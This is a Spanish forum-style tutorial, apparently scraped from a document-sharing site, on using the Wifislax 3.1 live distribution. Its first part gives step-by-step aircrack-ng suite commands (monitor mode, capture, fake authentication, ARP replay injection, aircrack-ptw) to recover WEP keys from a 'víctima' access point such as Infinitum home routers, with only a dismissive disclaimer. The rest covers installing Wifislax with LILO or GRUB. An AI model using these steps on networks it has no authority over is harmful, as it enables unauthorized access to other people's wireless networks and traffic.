Embed Size (px)
DESCRIPTION
Tutorial Wifislax
Citation preview
TUTORIAL: Auditoria Wireless Wifislax, saca claves WEP de redes inalámbricas
TUTORIAL - AUDITORIA WIRELESS CON WIFISLAX
Bueno chavos, pues aquí les traigo un tuto para hacer auditoria wireless con wifislax 3.1, lo siguiente
es una recopilación de los pasos que se deben seguir para lograrlo satisfactoriamente.
El "tutorial" original se encuentra en el siguiente link:
http://foro.seguridadwireless.net/in...ic,4528.0.html
De ahí he tomado la idea basica y las fotografías también aunque subidas desde otro servidor, le he
agregado detalles ya que en ese "tutorial" no se explica nada a detalle y es poco entendible para
algunos.
Falta decir que ni yo ni la página nos hacemos responsables de bla, bla, bla, bla....
FAQ:
Para qué sirve la auditoria wireless?Para inyectar paquetes a un punto de acceso y así poder obtener la clave WEP de los mismos.
Sirve para los módem infinitum? Sí, si sirve.
Todas las tarjetas wlan son compatibles?No, no todas sirven para inyección, te tocará buscar alguna que lo sea.
Empezemos
Lo que necesitamos:
- Wifislax 3.1 (Descargalo desde aquí)- PC con tarjeta de red inalámbrica compatible- 10 mins de tu tiempo y un poco de paciencia - Conocer la dirección MAC de tu wlan.- Pluma y papel.
Procedimiento:
Después de bajar el iso lo queman con el Nero, así les quedara un bonito live cd de linux. (Ya deberían
saber como se queman los iso)
Ahora ya con nuestro disco de wifislax lo insertamos en la pc e iniciamos desde el cd-rom, después de
unos minutos y de una o dos opciones que te aparecen, seguir unas cuantas indicaciones te loggeas e
inicias el entorno gráfico (Es muy fácil por eso no doy detalles).
Ya en el wifislax le das en el icono del escritorio "Shell" y te abre una ventana parecida al MS-DOS a
la cual le llamaremos "Consola" de ahora en adelante.
Ya en la empezaremos checando las tarjetas wlan con el siguiente comando:
iwconfig
Te aparecen las tarjetas que tienes instaladas en el sistema, entre ellas la que utilizarás, yo utilizo
una alfa network de 500mw y me basaré en ella.
Una vez identificada tu tarjeta se procede a correr el modo monitor con el siguiente comando:
airmon-ng start wlan0 6
Atención: Con este comando se inicia el modo monitor en el canal 6, si deseas utilizar otro canal para
detectar otras redes puedes sustituir el 6 por cualquier otro número.
Cliquea esta barra para ver la imagen completa.
Después de activado el modo monitor empezaremos a detectar redes en este caso en el canal 6.
airodump-ng -w aaaa -c6 wlan0 (Aquí mismo sustituyes -c6 por el canal que tú quieras) (El aaaa es un
nombre de archivo elegido por tí, se puede llamar hola si tú quieres)
Cliquea esta barra para ver la imagen completa.
Escoges alguna red con encriptación WEP, abres una nueva consola y escribes lo siguiente:
aireplay-ng -1 30 -e XXXX -a MACV -h MACC wlan0
Ahora explico el comando:
XXXX - Aquí va el ESSID de tu victimaMACV - Aquí va la dirección MAC de tu víctimaMACC - Aquí debes introducir la dirección MAC de tu wlan.
Quedaría más o menos así:
aireplay-ng -1 30 -e INFINITUMXXX -a 00:00:00:00:00 -h 00:00:00:01 wlan0
Con esto tu tarjeta quedará asociada con el punto de acceso víctima
Cliquea esta barra para ver la imagen completa.
Ahora empezaremos a inyectar paquetes usando el siguiente comando:
aireplay-ng -3 -x600 -b MACV -h MACC wlan0 (En este momento ya debes saber donde vas a sustituir y con
que)
Quedaría más o menos así:
aireplay-ng -3 -x600 -b 00:00:00:00:00 -h 00:00:00:00:01 wlan0
Después de esto los paquetes empezarán a ser enviados.
Cliquea esta barra para ver la imagen completa.
Después de sobrepasados los 100,000 paquetes enviados se procede a obtener la clave:
Abres una nueva consola y escribes lo siguiente:
aircrack-ptw aaaa-01.cap (Aquí se utiliza el nombre de archivo que especificamos casi al principio al
correr el airodump más el -01 o cualquier otro número -02, -03 etc...)
Cliquea esta barra para ver la imagen completa.
Apuntas la clave WEP y listo.
CUALQUIER DUDA O CORRECIÓN SON BIEN RECIBIDOS.
A VER SI LO VE UN MOD Y LO PONE EN TUTORIALES
…………………………………………….
………………………………………
…………………………….
1.- Wifislax 3.1 desde USB
2.- Conseguido wifislax instalado en USB - NO modo LIVEUSB sino instalación completa
Nos vamos a basar en varios titulares que se publicaron en el foro de seguridadwireless.net, y es allí donde podéis plantear vuestras dudas y problemas.
Usaremos básicamente dos aplicaciones que podemos encontrar en el menú de wifislax, los instaladores y el gtparted.
En la primera parte presentaremos el método de instalación mediante arranque con lilo y en la segunda parte el método de instalación mediante arranque con grub, para ambos métodos la gestión de las particiones es exactamente las mismas, así cual recomiendo que leáis todo el manual antes de empezar a instalar wifislax.
También explicaremos como conseguir un live-usb, es decir que wifislax se ejecute en vuestro pendrive de 1GB. Recomiendo leer: Wifislax 3.1 desde USB Manual directo liveusb
Instalación con cargador de arranque LILO
Arranque Lilo sin windows
Arranque Lilo con windows
Nota: los instaladores para usar como arranque LILO, están actualizados al igual que el instalador para arranque con grub, pero el tamaño real para que wifislax pueda trabajar perfectamente instalado en el disco duro no es 2.7GB sino 4GB, eso es lo mínimo que se necesita, si bien se aconseja un poquito más para guardar las capturas y ficheros temporales para la auditoria wireless. El programa de instalación básico es decir la opción que nos deja copiar todo el contenido de wifislax al disco si esta actualizada la información:
Y inicialmente preparemos las particiones si queremos con el Qtparted, corresponderá a la misma captura anterior pero pinchando en "Herramientas disco duro". Aunque el tratamiento de particiones lo podéis hacer desde Windows con las herramientas que mas os gusten.
Manual de unbas (redactado por lo tanto en primera persona)
Imagen del Qtparted y del instalador del Wifislax, para que os animéis a instalarlo.
Deciros que son perfectamente compatibles WifiSlax y Windows si lo hacéis bien.
Partiendo de disco HDA en el cual tenemos podemos tener tres particiones :
HDA—— |__hda1 = Windows | |__hda2 = Wifislax | |__hda3 = Swap ( Para el intercambio )
En caso de duda de los puntos de montaje de los pendrives podemos usar el comando fdisk -l para determinar que dispositivos externos y internos de almacenamiento tenemos, sean disco duros IDE o SATA, lectores DVD-CDROM, grabadores y lógicamente pendrives (llaveros usb).
Ahora donde pone fuente es el sitio donde tienes la liveCD metida en este caso : /Boot
El siguiente paso te pide donde guardar el Wifislax ( en mi caso en el hda2 )
En el tercer paso nos pregunta donde escribir el MBR, pues será en el sistema principal con lo cual en la raíz del disco duro ( en mi caso es en hda )
Ahora para que no haya problemas con el Windows como en la versión anterior (1.1) y así evitarnos tener que andar tocando el lilo.conf, nos pide que le digamos donde tenemos instalado el Windows, ( pues en su caso es hda1 ).
Unos minutos de instalación y tenemos todo perfecto.
Bastaría añadir por mi parte que el paso cuando nos pregunta donde escribir el MBR, pues podemos decirle que lo haga sobre /dev/fd0, que corresponde a la disquetera, siempre que este montada y con un disquete limpio.
Esto es importante porque así, no nos tocara el arranque de Windows, es decir sin el disquete, lo que arrancara siempre será Windows, y con el disquete lo hará con lilo y te dejara elegir o win o con linux.
Porque esto es tan importante, pues muy fácil, si tenemos guardado ese disquete, podemos tener semioculto lo que estamos haciendo en linux. Por si tenemos algún hermano que lo toca todo.
A continuación un ejemplo mas de como personalmente tengo yo mi disco duro particionado y que tuve que poner en el instalador:
Cualquier formateo o modificación de particiones, hacerlas con los dispositivos desmontados, y si son varias acciones de reparticionamiento y formateo las que tenemos que realizar, pues casi mejor reiniciar el sistema con la live CD entre una acción y otra. Y salvar cambios antes de salir del Qtparted.
Pero, después volver a montar la partición donde vamos a instalar Wifislax, ojo esto es muy importante, y no hay que olvidarlo.
/dev/hdba: No encontrareis en este caso el disco duro Master de la primera controladora IDE, porque simplemente esta desconectada la fuente de alimentación, ese disco nunca lo conecto a Internet.
/dev/hdb1: Partición de Windows.
/dev/hdb5: Partición para el intercambio de memoria SWAP, como veis es una burrada (1.8GB) pero la necesito así para el trabajo de creación del live CD. En vuestro caso fijarla igual a la RAM que tengáis en vuestro equipo.
/dev/hdb4: Es la que uso para crear los nuevos livecd.
/dev/hdb2: Con tanta partición se me quedo esa entremedio.
/dev/hdb3: Donde instalare el Wifislax, fijaros que esta como partición activa.
Por lo tanto solo es importante las particiones /dev/hdb3 y /dev/hdb5 en vuestro caso. Supongo que además tendréis también el Windows, en mi caso /dev/hdb1. Que son las tres mismas que citaba Unbas en su manual, a excepción que en mi caso son otros números y otras letras. Lo importante es saber que es cada cosa.
¿que tengo que poner en el instalador de Wifislax?
Fuente: /boot (para versiones 3.0 no hace falta)
Instalar Wifislax en: /mnt/hdb3
Escribir MBR: /dev/hdb (que es el disco duro donde estará instalado, independiente donde se grabe Wifislax, ya que el sector de arranque es único para cada disco duro, podéis seleccionar cualquier otro dispositivo)
Partición en Windows: /dev/hdb1. Le digo que es ahí donde tengo el SO Windows.
En esos campos siempre os aparecerá un listbox editable.
Nota: los instaladores para usar como arranque LILO, están actualizados al igual que el instalador para arranque con grub, pero el tamaño real para que wifislax pueda trabajar perfectamente instalado en el disco duro no es 2.7GB sino 4GB, eso es lo mínimo que se
necesita, si bien se aconseja un poquito más para guardar las capturas y ficheros temporales para la auditoria wireless.
Selecciono instalación real y basta con pinchar en Instalar para que se haga todo el proceso automático.
Si hubiera algún problema posterior en el arranque siempre podemos reconfigurar el /etc/lilo.conf y realizar alguna serie de maniobras. De la misma forma en el proceso seguro que se copiaron los ficheros correctamente, y con algunos comandos en shell podemos resolver el problema, sin necesidad de reinstalarlo todo ni de formatear y reparticionar todo el disco duro, y recuperar el propio Windows. Siempre es mejor preguntar en el foro el problema que no perder los nervios y dar por pensado que hemos destruido el Windows.
¿Que hacemos cuando tenemos problemas con el instalador de Wifislax?
Pensar que a lo mejor estáis instalando Wifislax en un dispositivo USB (pendrive) y que seguramente este dispositivo no tenga una capacidad de 2700MB por lo tanto usar la instalación comprimida (700MB).
¡ Fijaros bien las opciones que habéis elegido antes de pinchar en "Instalar" !
¿Que pasa si en modo live CD hemos necesitado de los cheatcodes para no tener problemas de arranque?
¿Como pasamos esas opciones en la instalación?
Vease un ejemplo:
boot = /dev/sdaprompttimeout = 80bitmap=/mnt/sda5/boot/splash.bmpchange-rulesresetvga = 0x317default = Windowsimage = /mnt/sda5/boot/vmlinuzroot = /dev/sda5initrd = /mnt/sda5/boot/splash.initrdlabel = Wifislaxappend="nopcmcia"read-writeother = /dev/sda2label = Windows
En este caso correspondía al cheatcode del arranque:
boot: ws nopcmcia
Nota: Al iniciar el arranque de wifislax, justo antes de cargar el arranque por lilo podemos usar la tecla [TAB] y modificar ciertas características por ejemplo añadir temporalmente cheatcodes y modificar resolución de pantalla.
Instalación con cargador de arranque GRUB
Antes de leer esta sección os recomiendo que hayáis leído todo lo anterior, porque en el manual de arranque por grub se hace mención a la gestión de las particiones, lo cual es valido para este método, y no solo para wifislax sino para cualquier distribución linux live-cd en general.
Esta opción es la mas recomendable.
Una vez preparadas las particiones accedemos al menú y seleccionamos "Sistema":
Seleccionaos Instalador de wifislax:
y arranque con grub:
Paso 1: El primer paso copiara e instalara todo el contenido de wifislax en el disco.
Solo tenemos que indicar el punto de montaje de la partición donde se instalar wifislax, además de la primera instalación siempre podemos volver a usarlo por si queremos volver a la instalación inicial, sin tener que tocar, sea el arrancador por LILO o por GRUB
Paso 2: Configurar GRUB
Dejamos la opción por defecto "simple".
Hemos limitado la configuración a esa resolución, pero puede ser modificado posteriormente modificando el fichero /boot/grub/menu.lst, yo personalmente prefiero 1024 x 768 y correspondería a vga=791
Indicamos la partición donde queremos instalar wifislax.
Por defecto sale la opción ROOT;
así pues indicamos MBR para la configuración de GRUB.
Indica el disco donde se instalar el MBR, en el mismo disco donde la partición que se instalo wifislax, habitualmente se puede dejar en blanco, porque el propio configurador ya lo asigna perfectamente.
Nos saldrán varios avisos.
Y si todo fue bien se termina el proceso de configuración,
donde nos muestra la dirección donde se generaron los archivos necesarios para el arranque con grub.
El archivo importante es menu.lst:
el cual podemos modificar a gusto, si bien tal como queda es mas que suficiente, pero por ejemplo se puede colocar vga=791 tal como explique anteriormente.
El titulo Wifislax 3.0 debería ser Wifislax 3.1, lo cual también se puede editar, vemos que están las entradas para Windows y todos los linux que tengo en mi ordenador. La entrada importarte
es:
title wifislax 3.0
root (hd0,0)
kernel ...............
initrd ..............
save default
que corresponde al wifislax 3.1 que hemos instalado en /mnt/hdb1, grub mantiene su propia sintaxis respecto a la numeración de particiones. hdb1=hd0,0
Todo este proceso ha sido automático y no hemos tenido que copiar nada, solo indicar la información pertinente donde debemos instalar y configurar wifislax, y a partir de hache se generaron todos los ficheros necesarios, esta proceso, es decir esta script de configuración han sido reelaborada por hadrianweb para ser especifica de wifislax.
Paso 3: es aquí realmente donde añadimos físicamente el arranque por GRUB al disco duro.
Nota: acabo de ver un error en las etiquetas, logicamente dispositivo, correspondería a partición donde se instalo wifislax, y wireless al disco donde queremos añadir en su MBR el grub, y nadie comento nada al respecto.
¿de que forma afectará los cheatcodes ?
Es simple, lo único que hay que hacer es añadir el cheatcode sin nada al final.
Un ejemplo para el nopcmcia:
title Wifislax 3.1 root (hd0,1) kernel /boot/vmlinuz root=/dev/sda2 ro vga=791 splash=silent showopts nopcmcia initrd /boot/splash.initrd savedefault
Los valores de sda2 y (hd0,1) pueden ser diferentes para cada persona, pero fijaros la forma de colocar el cheatcode nopcmcia.
![Tutorial Wifislax + Instálalo en tu Pc + Protege tu Red [WEP_WPA_WPA2_WPS] [UL] - Descargar Gratis](https://img.pdfslide.net/doc/110x75/55cf8576550346484b8e4247/tutorial-wifislax-instalalo-en-tu-pc-protege-tu-red-wepwpawpa2wps.jpg)
![USB Tutorial[1]](https://img.pdfslide.net/doc/110x75/577cd73b1a28ab9e789e6d87/usb-tutorial1.jpg)
![Sergio González - WiFiSlax 4.0 [RootedCON 2010]](https://img.pdfslide.net/doc/110x75/5598185f1a28ab621d8b4899/sergio-gonzalez-wifislax-40-rootedcon-2010.jpg)
